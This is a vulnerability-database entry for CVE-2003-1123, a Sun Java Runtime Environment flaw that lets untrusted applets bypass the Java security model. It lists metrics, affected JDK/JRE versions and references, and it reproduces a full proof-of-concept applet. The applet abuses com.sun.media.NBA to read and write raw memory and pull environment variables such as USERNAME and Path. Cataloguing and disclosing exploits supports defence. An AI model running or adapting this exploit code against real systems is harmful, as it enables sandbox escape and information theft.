CVE-2003-1123 : Detail

CVE-2003-1123

4.1%V3
Network
2005-03-12
04h00 +00:00
2017-07-10
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Sun Java Runtime Environment (JRE) and SDK 1.4.0_01 and earlier allows untrusted applets to access certain information within trusted applets, which allows attackers to bypass the restrictions of the Java security model.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 22732

Publication date : 2003-06-04 22h00 +00:00
Author : Marc Schoenefeld
EDB Verified : Yes

source: https://www.securityfocus.com/bid/7824/info It has been reported that the Sun Java Runtime Environment does not properly protect trusted java applets. Because of this, it may be possible for an attacker to use a malicious applet to gain access to sensitive information. /* Proof-Of-Concept: Read Environment via vulnerability Java Media Framework (2003) Marc Schoenefeld, www.illegalaccess.org */ import com.sun.media.NBA; import java.applet.Applet; import java.awt.Graphics; import javax.swing.JOptionPane; class NBAFactory { public static String getEnv(String a,long from, long to) { long pos = findMem(a,from,to); String ret = ""; if (pos != -1) { long pos2 = pos+a.length(); ret = getString(pos2); } return ret; } public static String getString(long pos) { int i = 0; StringBuffer b = new StringBuffer(); char x = 0; do { x = (char) readMem(pos+i); i++; if (x != 0) b.append(x); } while (!(x == 0)); return b.toString(); } public static long findMem(String a, long from , long to) { char[] ch = a.toCharArray(); for (long pos = from; pos < to ;pos++) { // System.out.println(pos-from+":"); int i = 0; int found = 0; for (i = 0; i < ch.length; i++) { char x = (char) readMem(pos+i); // System.out.println(pos+":"+x); if (x == ch[i]) { found ++; } else break; } if (found == ch.length) { return pos; } } return -1; } public static byte readMem(long i) { byte[] by = new byte[1]; NBA searcher = new NBA(byte[].class,1); long olddata = searcher.data; searcher.data = i; searcher.size = 1; searcher.copyTo(by); searcher.data = olddata; // keep the finalizer happy return by[0]; } public static void setMem(long i, char c) { NBA b = new NBA(byte[].class,1); long olddata = b.data; b.data = i; b.size = 1; theBytes[c].copyTo(b); b.data = olddata; // keep the finalizer happy } public static void setMem(long i, byte by) { setMem(i,(char) by); } public static void setMem(long i, int by) { setMem(i,(char) by); } public static void setMem(long l, String s) { char[] theChars = s.toCharArray(); NBA b = new NBA(byte[].class,1); long olddata = b.data; for (int i = 0 ; i < theChars.length; i++) { b.data = l+i; b.size = 1; theBytes[theChars[i]].copyTo(b); } b.data = olddata; // keep the finalizer happy } private NBAFactory() { } public static NBA getByte(char i) { return theBytes[i]; } public static NBA getByte(int i) { return theBytes[(char) i]; } public static NBA[] getBytes() { return theBytes; } static NBA[] theBytes = new NBA[256]; static { for (char i = 0; i < 256; i++) { // System.out.println((byte)i); NBA n = search(i,0x6D340000L, 0x6D46A000L); if (n!=null) theBytes[i]= n; else System.exit(-1); } } static NBA search (char theChar,long start, long end) { NBA ret = null; NBA searcher = new NBA(byte[].class,1); byte[] ba = new byte[1]; for (long i = start; i < end ; i++) { // byte b = readMem(i); searcher.data = i; searcher.copyTo(ba); // if ( b == (byte)theChar) { if ( ba[0] == (byte)theChar) { return searcher; } } return null; } } public class ReadEnv extends Applet{ static NBA base = new NBA(byte[].class,18); // what's the base pointer ? public static void crash(Object o) { System.out.println("Proof-Of-Concept: Read Environment via vulnerability Java Media Framework"); System.out.println("(2003) Marc Schoenefeld, www.illegalaccess.org"); NBA ret = new NBA(byte[].class,4); long oldret = ret.data; System.out.println("Base of data: "+Long.toString(base.data,16)); String[] envs = {"USERDOMAIN","USERNAME","USERPROFILE","CLASSPATH", "TEMP","COMSPEC","JAVA_HOME","Path","INCLUDE"}; for (int i = 0; i < envs.length; i++) { String val = NBAFactory.getEnv(envs[i],base.data,base.data+32768); if (!(o instanceof Applet)) { System.out.println(envs[i]+":"+val); } else { javax.swing.JOptionPane.showMessageDialog((java.applet.Applet) o,envs[i]+":"+val); } } //NBAFactory.setMem(pos+10,'A'); try { System.out.println(System.getProperty("java.class.path")); java.util.Properties p = System.getProperties(); p.list(System.out); } catch (java.security.AccessControlException e) { System.out.println("Cannot read environment via getProperties:"+e); } //System.out.println(pos); //long pos2 = NBAFactory.findMem("mixed",base.data,base.data+6614096); //System.out.println(pos2); //byte[] x11 = new byte[8]; //ret.copyTo(x11); //for (int i = 0; i < x11.length; i++) { // System.out.println(i+":"+x11[i]+(char)x11[i]); //} ret.data = oldret; //ret.data = 0xffff8000; //ret.finalize(); //ret.finalize(); //NBAFactory.setMem(ret.data-0xffff8000,33); //ret.finalize(); /*b.data = base.data; b.size = 16384;*/ /*byte[] ba3 = new byte[16384]; b.copyTo(ba3); for (int i = 0; i < ba3.length; i++) { System.out.println(new Integer(i).toString(i,16)+":"+ba3[i]+(char)ba3[i]); }*/ /*b.data = olddata;*/ } public static void main(String[] a) { crash(null); } public void paint(Graphics g) { if (init == 0) { init=1; crash(this); } } static int init = 0; }

Products Mentioned

Configuraton 0

Sun>>Jdk >> Version 1.2.2

    Sun>>Jdk >> Version 1.2.2_10

      Sun>>Jdk >> Version 1.2.2_10

        Sun>>Jdk >> Version 1.2.2_10

          Sun>>Jdk >> Version 1.2.2_11

            Sun>>Jdk >> Version 1.2.2_11

              Sun>>Jdk >> Version 1.2.2_11

                Sun>>Jdk >> Version 1.2.2_12

                  Sun>>Jdk >> Version 1.3

                    Sun>>Jdk >> Version 1.3.0_02

                      Sun>>Jdk >> Version 1.3.0_02

                        Sun>>Jdk >> Version 1.3.0_02

                          Sun>>Jdk >> Version 1.3.0_05

                            Sun>>Jdk >> Version 1.3.0_05

                              Sun>>Jdk >> Version 1.3.0_05

                                Sun>>Jdk >> Version 1.3.1_01

                                  Sun>>Jdk >> Version 1.3.1_01

                                    Sun>>Jdk >> Version 1.3.1_01a

                                      Sun>>Jdk >> Version 1.3.1_03

                                        Sun>>Jdk >> Version 1.3.1_03

                                          Sun>>Jdk >> Version 1.3.1_03

                                            Sun>>Jdk >> Version 1.3.1_04

                                              Sun>>Jdk >> Version 1.4

                                                Sun>>Jdk >> Version 1.4

                                                  Sun>>Jdk >> Version 1.4

                                                    Sun>>Jdk >> Version 1.4.0_01

                                                      Sun>>Jre >> Version 1.2.2

                                                        Sun>>Jre >> Version 1.2.2

                                                          Sun>>Jre >> Version 1.2.2

                                                            Sun>>Jre >> Version 1.2.2

                                                              Sun>>Jre >> Version 1.2.2

                                                                Sun>>Jre >> Version 1.2.2_003

                                                                  Sun>>Jre >> Version 1.2.2_011

                                                                    Sun>>Jre >> Version 1.2.2_011

                                                                      Sun>>Jre >> Version 1.2.2_011

                                                                        Sun>>Jre >> Version 1.2.2_012

                                                                          Sun>>Jre >> Version 1.3.0

                                                                          Sun>>Jre >> Version 1.3.0

                                                                            Sun>>Jre >> Version 1.3.0

                                                                              Sun>>Jre >> Version 1.3.0

                                                                              Sun>>Jre >> Version 1.3.0

                                                                                Sun>>Jre >> Version 1.3.0

                                                                                  Sun>>Jre >> Version 1.3.0

                                                                                    Sun>>Jre >> Version 1.3.0

                                                                                      Sun>>Jre >> Version 1.3.0

                                                                                        Sun>>Jre >> Version 1.3.0

                                                                                          Sun>>Jre >> Version 1.3.1

                                                                                            Sun>>Jre >> Version 1.3.1

                                                                                              Sun>>Jre >> Version 1.3.1

                                                                                                Sun>>Jre >> Version 1.3.1

                                                                                                  Sun>>Jre >> Version 1.3.1

                                                                                                    Sun>>Jre >> Version 1.3.1

                                                                                                      Sun>>Jre >> Version 1.3.1_03

                                                                                                        Sun>>Jre >> Version 1.3.1_03

                                                                                                          Sun>>Jre >> Version 1.3.1_03

                                                                                                            Sun>>Jre >> Version 1.4

                                                                                                              Sun>>Jre >> Version 1.4

                                                                                                                Sun>>Jre >> Version 1.4

                                                                                                                  Sun>>Jre >> Version 1.4.0_01

                                                                                                                    Sun>>Jre >> Version 1.4.0_01

                                                                                                                      References

                                                                                                                      http://sunsolve.sun.com/search/document.do?assetkey=1-26-55100-1
                                                                                                                      Tags : vendor-advisory, x_refsource_SUNALERT
                                                                                                                      http://www.kb.cert.org/vuls/id/393292
                                                                                                                      Tags : third-party-advisory, x_refsource_CERT-VN
                                                                                                                      http://www.securityfocus.com/bid/7824
                                                                                                                      Tags : vdb-entry, x_refsource_BID
                                                                                                                      http://secunia.com/advisories/8958
                                                                                                                      Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                                                      http://securitytracker.com/id?1006935
                                                                                                                      Tags : vdb-entry, x_refsource_SECTRACK